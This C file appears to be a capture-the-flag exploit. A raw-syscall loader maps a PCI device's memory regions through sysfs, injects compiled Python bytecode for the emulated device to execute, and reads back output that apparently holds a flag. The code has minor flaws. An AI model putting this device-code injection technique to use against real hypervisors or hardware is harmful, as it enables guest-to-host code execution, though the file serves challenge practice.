// gcc -nostdlib -static mmio_loader.c -o mmio_loader
typedef unsigned long ulong;
typedef unsigned long long u64;
typedef unsigned int u32;
typedef unsigned char u8;
#define SYS_OPENAT 257
#define SYS_MMAP 9
#define SYS_WRITE 1
#define SYS_EXIT 60
// ------------------- syscalls ------------------------
static inline long sys_openat(int dirfd, const char *path, int flags) {
long ret;
asm volatile ("syscall"
: "=a"(ret)
: "0"(SYS_OPENAT), "D"(dirfd), "S"(path), "d"(flags)
: "rcx", "r11", "memory");
return ret;
}
static inline long sys_mmap(void *addr, ulong len, ulong prot,
ulong flags, ulong fd, ulong off) {
long ret;
register ulong r10 asm("r10") = flags;
register ulong r8 asm("r8") = fd;
register ulong r9 asm("r9") = off;
asm volatile(
"syscall"
: "=a"(ret)
: "0"(SYS_MMAP),
"D"(addr),
"S"(len),
"d"(prot),
"r"(r10),
"r"(r8),
"r"(r9)
: "rcx", "r11", "memory"
);
return ret;
}
// *** FIXED: length should be size_t/ulong, NOT int ****
static inline long sys_write(int fd, const void *buf, ulong len) {
long ret;
asm volatile ("syscall"
: "=a"(ret)
: "0"(SYS_WRITE), "D"(fd), "S"(buf), "d"(len)
: "rcx", "r11", "memory");
return ret;
}
static inline void sys_exit(int code) {
asm volatile(
"syscall"
:
: "a"(SYS_EXIT), "D"(code)
: "rcx", "r11", "memory"
);
}
// ------------------- utils ------------------------
// ------------------- main ------------------------
static const char path[] =
"/sys/bus/pci/devices/0000:00:03.0/resource0";
static const char path1[] =
"/sys/bus/pci/devices/0000:00:03.0/resource1";
void _start() {
long fd = sys_openat(-100, path, 2); // O_RDWR
if (fd < 0) sys_exit(1);
long fd1 = sys_openat(-100, path1, 2); // O_RDWR
if (fd1 < 0) sys_exit(1);
// ****** FIXED MMAP FLAGS ******
// You used MAP_PRIVATE | MAP_SHARED → illegal → mmap failure → SEGFAULT
//
// Correct for PCI BAR mapping:
// prot = PROT_READ|PROT_WRITE = 3
// flags = MAP_SHARED | MAP_FIXED? no.
// flags = MAP_SHARED | MAP_FILE = 1 | 0x20
//
// For PCI BAR, MAP_SHARED (1) is enough.
u8 *mmio = (u8*)sys_mmap(
0, // addr
0x1000, // len
1 | 2, // prot = PROT_READ|PROT_WRITE
1, // flags = MAP_SHARED
fd, // file descriptor
0 // offset 0
);
if (mmio == (void*)-1 || mmio == 0)
sys_exit(18);
u8 *stdout = (u8*)sys_mmap(
0, // addr
0x1000, // len
1 | 2, // prot = PROT_READ|PROT_WRITE
1, // flags = MAP_SHARED
fd1, // file descriptor
0 // offset 0
);
if (stdout == (void*)-1 || stdout == 0)
sys_exit(18);
// ------------------------------
// Send test Python bytecode
// ------------------------------
u8 patch_bytes[] = {
0xf3,0x0d,0x0d,0x0a,0x03,0x00,0x00,0x00,0x20,0x2a,0xf1,0xcf,0x3a,0x47,0xf4,0xcd
};
const u8 code[] = { 0xf3,0x0d,0x0d,0x0a,0x00,0x00,0x00,0x00,0x79,0xca,0x38,0x69,0x66,0x00,0x00,0x00,0xe3,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf3,0x5a,0x00,0x00,0x00,0x95,0x00,0x1e,0x00,0x53,0x00,0x53,0x01,0x4b,0x00,0x72,0x00,0x5c,0x01,0x22,0x00,0x5c,0x00,0x52,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x35,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x67,0x01,0x21,0x00,0x5c,0x03,0x07,0x00,0x61,0x0b,0x00,0x00,0x20,0x00,0x5c,0x01,0x22,0x00,0x53,0x02,0x35,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x1f,0x00,0x67,0x01,0x66,0x00,0x3d,0x03,0x1f,0x00,0x66,0x01,0x29,0x03,0xe9,0x00,0x00,0x00,0x00,0x4e,0x7a,0x17,0x4e,0x6f,0x20,0x67,0x69,0x66,0x74,0x73,0x20,0x61,0x72,0x65,0x20,0x61,0x76,0x61,0x69,0x6c,0x61,0x62,0x6c,0x65,0x21,0x29,0x04,0xda,0x05,0x67,0x69,0x66,0x74,0x73,0xda,0x05,0x70,0x72,0x69,0x6e,0x74,0xda,0x04,0x66,0x6c,0x61,0x67,0xda,0x09,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0xa9,0x00,0xf3,0x00,0x00,0x00,0x00,0xda,0x04,0x6f,0x2e,0x70,0x79,0xda,0x08,0x3c,0x6d,0x6f,0x64,0x75,0x6c,0x65,0x3e,0x72,0x0a,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x73,0x31,0x00,0x00,0x00,0xf0,0x03,0x01,0x01,0x01,0xf0,0x02,0x04,0x01,0x25,0xdb,0x04,0x10,0xd9,0x04,0x09,0x88,0x25,0x8f,0x2a,0x89,0x2a,0xd5,0x04,0x15,0xf8,0xd8,0x07,0x10,0xf3,0x00,0x01,0x01,0x25,0xd9,0x04,0x09,0xd0,0x0a,0x23,0xd6,0x04,0x24,0xf0,0x03,0x01,0x01,0x25,0xfa,0x73,0x0c,0x00,0x00,0x00,0x82,0x16,0x19,0x00,0x99,0x0e,0x2a,0x03,0xa9,0x01,0x2a,0x03};
const u32 code_len = sizeof(code);
u64 val = 0xf0a0101a75bc9dd3ULL;
*(u64*)(code + 0x08) = val;
for (u32 i = 0; i < code_len; i++)
mmio[0x100 + i] = code[i];
// scratch register
*(u32*)(mmio + 0x04) = code_len;
// code length
*(u32*)(mmio + 0x10) = code_len;
// trigger execution
*(u32*)(mmio + 0x0C) = 1;
char* msg = "MMIO write complete\n";
sys_write(1, msg, 11);
for (int i=0; i < 100; i++) {
char magic = *(char*)(stdout + i);
sys_write(1, &magic, 1);
}
// verify device responds
// print_hex32(*(u32*)(mmio + 0x00)); // should print PYPU magic
sys_exit(0);
}